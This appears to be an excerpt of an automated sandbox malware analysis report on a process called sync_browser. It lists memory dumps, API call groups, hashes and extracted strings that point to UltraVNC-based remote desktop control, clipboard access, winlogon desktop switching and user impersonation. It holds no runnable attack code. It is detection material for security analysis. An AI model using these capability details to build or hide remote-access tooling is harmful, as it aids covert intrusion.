                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                    • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                    • API String ID: 1650122287-1031704962
                                                                    • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction ID: 649309f1ecd796c3fb49cd4abe7667019e2314a8457387f2dc070d025da2ffd6
                                                                    • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction Fuzzy Hash: 9681F63591CA82D1EB11BF20E4543ADB3A0FB59B98F844132DA6D4B3A8DF78E644C330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                    • String ID: ./\
                                                                    • API String ID: 385398445-3176372042
                                                                    • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                    • Instruction ID: cc10c5296fb0aad10eca85d1d67b27e26c557b14da4bf883c3afc10645df54c4
                                                                    • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                    • Instruction Fuzzy Hash: D4E16D6290C252C6EA64BF60A05427EF7B0FB86750F944035EA8D17BA9DF7DF854CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
                                                                    • String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
                                                                    • API String ID: 2898369102-3720325205
                                                                    • Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                    • Instruction ID: dc9ad1ba6dab29b300c29bbb1d24d7797bd09793aefa5cf5dbd4d28818973472
                                                                    • Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                    • Instruction Fuzzy Hash: 09A11535A0CA86C6E664BF15B8402A9A3A0FF88780FC44139D99D47B69EF3DF445CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseEmptyOpen
                                                                    • String ID:
                                                                    • API String ID: 1427272684-0
                                                                    • Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                    • Instruction ID: 1746782ec1d52412251a28ee772d124c85b243b45d0bf4c1b5b1541b92a20813
                                                                    • Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                    • Instruction Fuzzy Hash: 5BC10831B0DB02D6EA24BF65A8541B9A3A1BF59B84B845039DE1E477B9EF3CF444C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
                                                                    • String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                    • API String ID: 378279424-2704384803
                                                                    • Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                    • Instruction ID: 064e73ff99a8f58ea3a5332d5e25a87550a697c0fa0103f24b591393310579ee
                                                                    • Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                    • Instruction Fuzzy Hash: A5027022A0C682D7FA6ABB25D6947B8A3A4FF41B40F944535CA1D533B9CF7CB458C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
                                                                    • String ID: F
                                                                    • API String ID: 2411647221-1304234792
                                                                    • Opcode ID: 3eacc1ec8eb3fbd81f3eab9d0f5820d06a9a4d22da5eaeb56aec88f07a7f87b3
                                                                    • Instruction ID: 9cc016a82fa4c77a5f85a9ca03b29ddcda3c960d836caa3b3bd2e91d6b0b5f51
                                                                    • Opcode Fuzzy Hash: 3eacc1ec8eb3fbd81f3eab9d0f5820d06a9a4d22da5eaeb56aec88f07a7f87b3
                                                                    • Instruction Fuzzy Hash: 87C17D2660CA82C6E610FB16E4447A9B7A1FF88B84F958031DE5E43769DF3CE445C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                                    • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2965397059-206656798
                                                                    • Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                                    • Instruction ID: d18f138f9af4bc8773527762cef3371561296544662d152414e93afdf46476b6
                                                                    • Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                                    • Instruction Fuzzy Hash: 9D42B022A0C682C5EB60BB35C8587FD67A1EB85798F840239DA1D477E9DF38F945C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 246551654-3977938048
                                                                    • Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                                    • Instruction ID: 2c0f828952579c9d6fea332863b6335b67a90bcb5105f29f26a08eeef54be5df
                                                                    • Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                                    • Instruction Fuzzy Hash: 1E228D32A0C691C6E764BB35D4587EEB7A1FB85748F85403ACA4D477A8CF38E954C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                                    • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 1729393483-4131161223
                                                                    • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                    • Instruction ID: 7caba5138da4d6484ba0f98b83957014c7338a48ef4757a1c44ee353d072d338
                                                                    • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                    • Instruction Fuzzy Hash: 72B18A32A0D682C6EB60BB24A8402B9B3A0EF45754FD44135DE5D5BBA8EF3DE605C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
                                                                    • String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
                                                                    • API String ID: 1989023930-362996323
                                                                    • Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                    • Instruction ID: a2ff61512fd5d4d0bd4ed5da7f70de1bdbb6e6a2ecd49581dbd933a49b2a3e3a
                                                                    • Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                    • Instruction Fuzzy Hash: CCB17E21608B82D2EA54FB60A451BEAA3A0FF89754FC04031EB5D17BA9DF3DF519C750
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32 ref: 00007FF740012E5D
                                                                    • OpenServiceA.ADVAPI32 ref: 00007FF740012EAD
                                                                    • GetLastError.KERNEL32 ref: 00007FF740012EBB
                                                                    • CloseServiceHandle.ADVAPI32 ref: 00007FF740012EE0
                                                                      • Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
                                                                      • Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
                                                                      • Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
                                                                      • Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
                                                                      • Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
                                                                      • Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
                                                                      • Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                                    • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                                    • API String ID: 1921882253-4018834470
                                                                    • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                    • Instruction ID: 868a9983b38ccdd812511e0c57e0005df7036e303c76254e171375bd2e091816
                                                                    • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                    • Instruction Fuzzy Hash: 94412835A0CA47C2FA14BB11A8146B8A3A1BF59B44FC40039D91E4A7BDEE3DF5968770
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                                    • String ID:
                                                                    • API String ID: 1939172783-0
                                                                    • Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                    • Instruction ID: 345f86f77d6db0725d3695746b4202d1ce5d693792f9913fdcfd03c6f1a444c4
                                                                    • Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                    • Instruction Fuzzy Hash: 91813B21A1DB42D6E654BF26B9506B9B3A0FF84B80B844138DE5E477A9DF3CF424C720
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF74002C43D
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF74002C3DC
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF74002C2F4
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF74002C37E
                                                                    • g, xrefs: 00007FF74002C31B
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF74002C3A7
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF74002C455
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
